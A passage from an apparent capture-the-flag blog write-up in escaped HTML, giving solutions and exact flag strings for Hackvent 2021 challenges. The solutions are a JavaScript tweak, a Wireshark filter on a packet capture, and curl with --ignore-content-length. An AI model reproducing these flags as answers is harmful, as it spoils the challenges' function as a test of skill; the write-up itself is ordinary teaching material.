1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1b\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1b\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c<\/pre>\n\n\n\n<p>If we open this in a text editor and resize it accordingly we can read the flag. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"735\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol-1024x735.png\" alt=\"\" class=\"wp-image-1765\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol-1024x735.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol-300x215.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol-768x552.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol.png 1526w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{Too_K3wL_F0R_YuLe!}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.06] Snow Cube<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"834\" height=\"116\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-11.png\" alt=\"\" class=\"wp-image-1711\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-11.png 834w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-11-300x42.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-11-768x107.png 768w\" sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>Dr Nick<\/em>. Stay out of blizzards!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The ester bunny sent a gift to Santa &#8211; what is usually a crystal sphere seemed a bit too boring, so it&#8217;s a cube!<\/p>\n\n\n\n<p>The snow seems to be falling somewhat strangely, is it possible that there&#8217;s a message hidden somewhere?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Resources<\/h2>\n\n\n\n<p>Please don&#8217;t stop the container when you&#8217;re done: everyone is using the same instance. If you stop it, others will have to restart it. And please don&#8217;t be a&nbsp;<code>*@#!%<\/code>. Everyone can write a script to stop the instance, but all that would do is take the fun away from others!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"846\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12-1024x846.png\" alt=\"\" class=\"wp-image-1712\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12-1024x846.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12-300x248.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12-768x634.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12.png 1136w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>I copied the <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/snowman06.html\" target=\"_blank\">source code<\/a> to debug it with <a rel=\"noreferrer noopener\" href=\"https:\/\/jsfiddle.net\" target=\"_blank\">https:\/\/jsfiddle.net<\/a>. <\/p>\n\n\n\n<p>In the beginning of the code we can spot that there is another calculation for alpha if &#8220;s&#8221; is set to true:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">const canvas = document.getElementById(\"canvasSwonCube\");\n\t\t\tconst context = canvas.getContext(\"2d\");\n\t\t\tlet alpha = 0;\n\t\t\tlet beta = 0;\n\t\t\tlet s = false;\n\t\t\tlet a = canvas.width;\n\t\t\tcanvas.addEventListener('keydown', e => s = (e.key === 's'));\n\t\t\tcanvas.addEventListener('keyup', e => s = false);\n\t\t\tcanvas.addEventListener('mousemove', e => {\n\t\t\t\tvar rect = e.target.getBoundingClientRect();\n\t\t\t\talpha = s?((e.clientX-rect.left-a\/2)*7\/a):Math.sin(((e.clientX-rect.left-a\/2)*7\/a));\n\t\t\t\tbeta = Math.sin(((e.clientY-rect.top-a\/2)*7\/a));\n\t\t\t});\n<\/pre>\n\n\n\n<p>Let&#8217;s change &#8220;s&#8221; to true and observe the snowman in the output window of JSFiddle. If we change the view and let the snowman look to the right side, we can observe characters coming down in the snow.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"884\" height=\"776\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-49.png\" alt=\"\" class=\"wp-image-1768\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-49.png 884w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-49-300x263.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-49-768x674.png 768w\" sizes=\"auto, (max-width: 884px) 100vw, 884px\" \/><\/figure>\n\n\n\n<p> By collecting all the characters (this was not too easy!) we get the flag.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{M3SSAGE_OUT_OF_FLAKES}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.07] Grinch&#8217;s Portscan<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"828\" height=\"126\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-13.png\" alt=\"\" class=\"wp-image-1713\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-13.png 828w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-13-300x46.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-13-768x117.png 768w\" sizes=\"auto, (max-width: 828px) 100vw, 828px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>wangibangi<\/em>. Watch your port(e)s around x-mas!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves port-scanned grinch&#8217;s server and noticed something strange.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>There&#8217;s a secret message hidden in the&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/a343d168-3e6e-42b7-af30-b27c1c03de12.pcap\" target=\"_blank\" rel=\"noreferrer noopener\">packet capture<\/a>, can you find it?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>After fiddling around for a bit in Wireshark I could find the flag. It is encoded in the ports which are requested, the ones where the server replies are valid characters. I used the following filter to get all matching packets:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\"ip.src == 172.16.66.10 and tcp.len &gt; 0\":<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Screenshot-from-2021-12-07-09-50-31-1024x429.png\" alt=\"\" class=\"wp-image-1769\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{c0nfuse_Portsc4nn3rs}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.08] Flag Service<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"824\" height=\"106\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-14.png\" alt=\"\" class=\"wp-image-1714\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-14.png 824w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-14-300x39.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-14-768x99.png 768w\" sizes=\"auto, (max-width: 824px) 100vw, 824px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>nichtseb<\/em>&nbsp;and&nbsp;<em>logical overflow<\/em>. Keep away from the white flags (never give up)!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa has setup a web service for you to receive your flag for today. Unfortunately, the flag doesn&#8217;t seem to reach you.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Resources<\/h2>\n\n\n\n<p>Please don&#8217;t stop the container when you&#8217;re done: everyone is using the same instance. If you stop it, others will have to restart it. And please don&#8217;t be a&nbsp;<code>*@#!%<\/code>. Anyyone can write a script to stop the instance again and again, but all that would do is take the fun away from others!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"434\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-1024x434.png\" alt=\"\" class=\"wp-image-1715\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-1024x434.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-300x127.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-768x325.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-1536x651.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-2048x868.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This webserver returns a wrong (too short) content-length header. Browsers and other clients like curl only download the amount of bytes specified in this header. We see that the response from the server is too short (cut), because the HTML code is not correctly terminated. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ curl 6cd40b58-94d6-48b7-ba97-5ee13727a051.rdocker.vuln.land\n&lt;!DOCTYPE html>\n    &lt;html>\n    &lt;head>\n        &lt;meta charset=\"utf-8\" \/>\n        &lt;link rel=\"preconnect\" href=\"https:\/\/fonts.googleapis.com\">\n        &lt;link rel=\"preconnect\" href=\"https:\/\/fonts.gstatic.com\" crossorigin>\n        &lt;link href=\"https:\/\/fonts.googleapis.com\/css2?family=IBM+Plex+Mono&amp;display=swap\" rel=\"stylesheet\">\n        &lt;style>\n        body{font-family: 'IBM Plex Mono', monospace;height: 100vh !important;background-image: url(\"https:\/\/source.unsplash.com\/random\");-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;background-color:#131627;color:#fff;overflow:hidden;}\n        ::selection{background-color:rgba(0, 0, 0, 0);}\n        #flex-wrapper{position:absolute;top:0;bottom:0;right:0;left:0;-ms-flex-direction:row;-ms-flex-align:center;display:-webkit-flex;display:flex}#container{margin:auto; z-index: 10; padding:25px;}#container *{margin:0}h1{text-align:center;font-size:60px;color:#131627;text-shadow:0 0 5px #fff;opacity:0;-webkit-animation:fade-in 3s ease-in 0s forwards;-moz-animation:fade-in 3s ease-in 0s forwards;-o-animation:fade-in 3s ease-in 0s forwards;animation:fade-in 3s ease-in 0s forwards}h2{font-size:50px;text-shadow:0 0 5px orange;text-align:center;opacity:0;-webkit-animation:fade-in 3s ease-in .5s forwards;-moz-animation:fade-in 3s ease-in .5s forwards;-o-animation:fade-in 3s ease-in .5s forwards;animation:fade-in 3s ease-in .5s forwards}@-webkit-keyframes fade-in{from{opacity:0}to{opacity:1}}@-moz-keyframes fade-in{from{opacity:0}to{opacity:1}}@-o-keyframes fade-in{from{opacity:0}to{opacity:1}}@keyframes fade-in{from{opacity:0}to{opacity:1}}\n        &lt;\/style>\n        &lt;title>Flag Service&lt;\/title>\n    &lt;\/head>\n    &lt;body>\n        &lt;div id=\"flex-wrapper\">\n        &lt;div id=\"container\">\n            &lt;h1>Thanks for using the Flag service.&lt;br\/> Your Flag is:&lt;\/h1>\n            &lt;h2><\/pre>\n\n\n\n<p>Fortunately, curl has a flag to ignore the content-length. This way we can get the whole website and read the flag.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ curl 6cd40b58-94d6-48b7-ba97-5ee13727a051.rdocker.vuln.land -v --ignore-content-length\n*   Trying 152.96.7.2:80...\n* TCP_NODELAY set\n* Connected to 6cd40b58-94d6-48b7-ba97-5ee13727a051.rdocker.vuln.land (152.96.7.2) port 80 (#0)\n> GET \/ HTTP\/1.1\n> Host: 6cd40b58-94d6-48b7-ba97-5ee13727a051.rdocker.vuln.land\n> User-Agent: curl\/7.68.0\n> Accept: *\/*\n>\n* Mark bundle as not supporting multiuse\n&lt; HTTP\/1.1 200 OK\n&lt; Connection: close\n&lt; Content-Type: text\/html\n&lt; Content-Length: 1878\n&lt;\n&lt;!DOCTYPE html>\n    &lt;html>\n    &lt;head>\n        &lt;meta charset=\"utf-8\" \/>\n        &lt;link rel=\"preconnect\" href=\"https:\/\/fonts.googleapis.com\">\n        &lt;link rel=\"preconnect\" href=\"https:\/\/fonts.gstatic.com\" crossorigin>\n        &lt;link href=\"https:\/\/fonts.googleapis.com\/css2?family=IBM+Plex+Mono&amp;display=swap\" rel=\"stylesheet\">\n        &lt;style>\n        body{font-family: 'IBM Plex Mono', monospace;height: 100vh !important;background-image: url(\"https:\/\/source.unsplash.com\/random\");-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;background-color:#131627;color:#fff;overflow:hidden;}\n        ::selection{background-color:rgba(0, 0, 0, 0);}\n        #flex-wrapper{position:absolute;top:0;bottom:0;right:0;left:0;-ms-flex-direction:row;-ms-flex-align:center;display:-webkit-flex;display:flex}#container{margin:auto; z-index: 10; padding:25px;}#container *{margin:0}h1{text-align:center;font-size:60px;color:#131627;text-shadow:0 0 5px #fff;opacity:0;-webkit-animation:fade-in 3s ease-in 0s forwards;-moz-animation:fade-in 3s ease-in 0s forwards;-o-animation:fade-in 3s ease-in 0s forwards;animation:fade-in 3s ease-in 0s forwards}h2{font-size:50px;text-shadow:0 0 5px orange;text-align:center;opacity:0;-webkit-animation:fade-in 3s ease-in .5s forwards;-moz-animation:fade-in 3s ease-in .5s forwards;-o-animation:fade-in 3s ease-in .5s forwards;animation:fade-in 3s ease-in .5s forwards}@-webkit-keyframes fade-in{from{opacity:0}to{opacity:1}}@-moz-keyframes fade-in{from{opacity:0}to{opacity:1}}@-o-keyframes fade-in{from{opacity:0}to{opacity:1}}@keyframes fade-in{from{opacity:0}to{opacity:1}}\n        &lt;\/style>\n        &lt;title>Flag Service&lt;\/title>\n    &lt;\/head>\n    &lt;body>\n        &lt;div id=\"flex-wrapper\">\n        &lt;div id=\"container\">\n            &lt;h1>Thanks for using the Flag service.&lt;br\/> Your Flag is:&lt;\/h1>\n            &lt;h2>HV21{4lw4y5_c0un7_y0ur53lf_d0n7_7ru57_7h3_53rv3r}&lt;\/h2>\n            &lt;\/div>\n        &lt;\/div>\n        &lt;\/div>\n    &lt;\/body>\n&lt;\/html>\n* Closing connection 0<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{4lw4y5_c0un7_y0ur53lf_d0n7_7ru57_7h3_53rv3r}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.09] Brother Santa<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"822\" height=\"118\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-17.png\" alt=\"\" class=\"wp-image-1717\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-17.png 822w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-17-300x43.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-17-768x110.png 768w\" sizes=\"auto, (max-width: 822px) 100vw, 822px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>brp64<\/em>. Amen!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Ever security minded, Santa is. So switched to a&nbsp;<em>prime<\/em>&nbsp;encoding system he has, after contemplating for long.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"726\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-1024x726.png\" alt=\"\" class=\"wp-image-1718\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-1024x726.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-300x213.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-768x545.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-1536x1089.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18.png 1760w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Peace and prosperity &#8211; and, you 